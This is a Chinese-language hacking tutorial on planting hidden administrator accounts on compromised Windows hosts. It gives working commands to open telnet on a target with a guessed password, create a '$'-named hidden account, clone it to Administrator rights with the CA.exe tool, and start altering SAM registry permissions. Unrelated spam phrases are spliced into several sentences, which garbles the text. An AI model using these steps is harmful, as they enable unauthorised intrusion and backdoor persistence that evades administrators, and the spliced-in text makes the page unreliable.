创建隐藏用户
一.创建隐藏用户
一、利用帐户克隆工具来创建
      Clone AdministratorCA.exe),利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号(此普通帐号必须已经存在)。克隆得到的帐号具有和系统内置的Administrator同样的设置,并且用NET命令或者用户管理器也发现不了其权限已经被提升,是一个不错的ROOT KIT
    现在,我们就来看看如何利用帐户克隆工具在肉鸡上创建隐藏的超级用户。
    利用流光、SuperScan等进行扫描,假设已经扫描到一远程主机的Administrator帐户,其密码为123。我们可以使用DameWare Mini Remote Control(简称DMRC),在图形界面(GUI)中来远程控制远程主机。也可以使用工具来开启远程主机的TELNET服务,其命令格式为: \\server username password NTLMAuthor telnetport南瓜饼怎么做才好吃又简单,使用命令:opentelnet \\192.XX.XX.2 Administrator "123" 0 99,呵呵,没想这么成功容易就开启肉鸡的TELNET吧!接着使用命令:Telnet 192.XX.XX.2 99,输入帐户及密码,成功获取一SHELL
    首先想办法查看一下有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然也会禁用其他用户。在图形界面下,非常容易识别,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉。但在命令行状态下,只能使用命令:net user 用户名一个一个来查看用户是否被禁用。如果懒得这样麻烦,可自行建立一个新的帐户,命令为:Net user hacker$ youkou /add”,然后使用命令:Net user hacker$ /active:no”来停用此帐户。
聚美优品广告词改编
    断开与远程主机的连接,用小榕的超级用户克隆程序CA.exe,将被禁用的用户hacker$克隆成超级用户,命令为:CA.EXE \\192.XX.XX.2 Administrator 123 hacker$ youkou,成功!
小说主角叫陆鸣
  这时,hacker$就成为了超级用户,并有具有和Administrator同样的设置(桌面、菜单等等)。但还是得检查一下,用,命令如下:cca \\192.XX.XX.2 administrator 123
 
    看到这一行返回信息没有?[hacker$] AS SAME AS [Administrator]”,说明hacker$退税一般要多久才能到账帐户和Administrator相同,克隆成功。
二、图形界面建隐藏超级用户
    恐怕我们最熟悉的就是在图形界面下进行操作了,这对于在本地计算机、3389手机拜年短信终端服务肉鸡或使用DMRC等控制的肉鸡上创建隐藏超级用户 再好不过了。
    大家知道吗?Windows 2000中有两个注册表编辑器:Windows XP实为一个程序,修改键值的权限时在右键快捷菜单中选择权限来修改。对我想大家都很熟悉,但却不能对注册表的键进行权限设置,而最大的优点就是能够对注册表的项键设置权限。Windows NT/2000/XP的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了系统用户SYSTEM外,其他用户都没有权限查看到其中的信息,因此首先得用HKEY_LOCAL_MACHINE\SAM\SAM”键设置为完全控制权限。这样就可以对SAM键内的信息进行读写操作。
    首先在肉鸡中创建一个新的帐户九阴真经门派hacker$,可以在帐户管理器中建立,也可以使用命令:net user hacker$ 123 /add 来创建。然后通过开始菜单中的运行,输入
e,点击确定后就打开了注册表编辑器。依次展开子键HKEY_LOCAL_MACHINE\SAM\SAM,用鼠标右键单击,在弹出的快捷菜单中选择权限项。

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。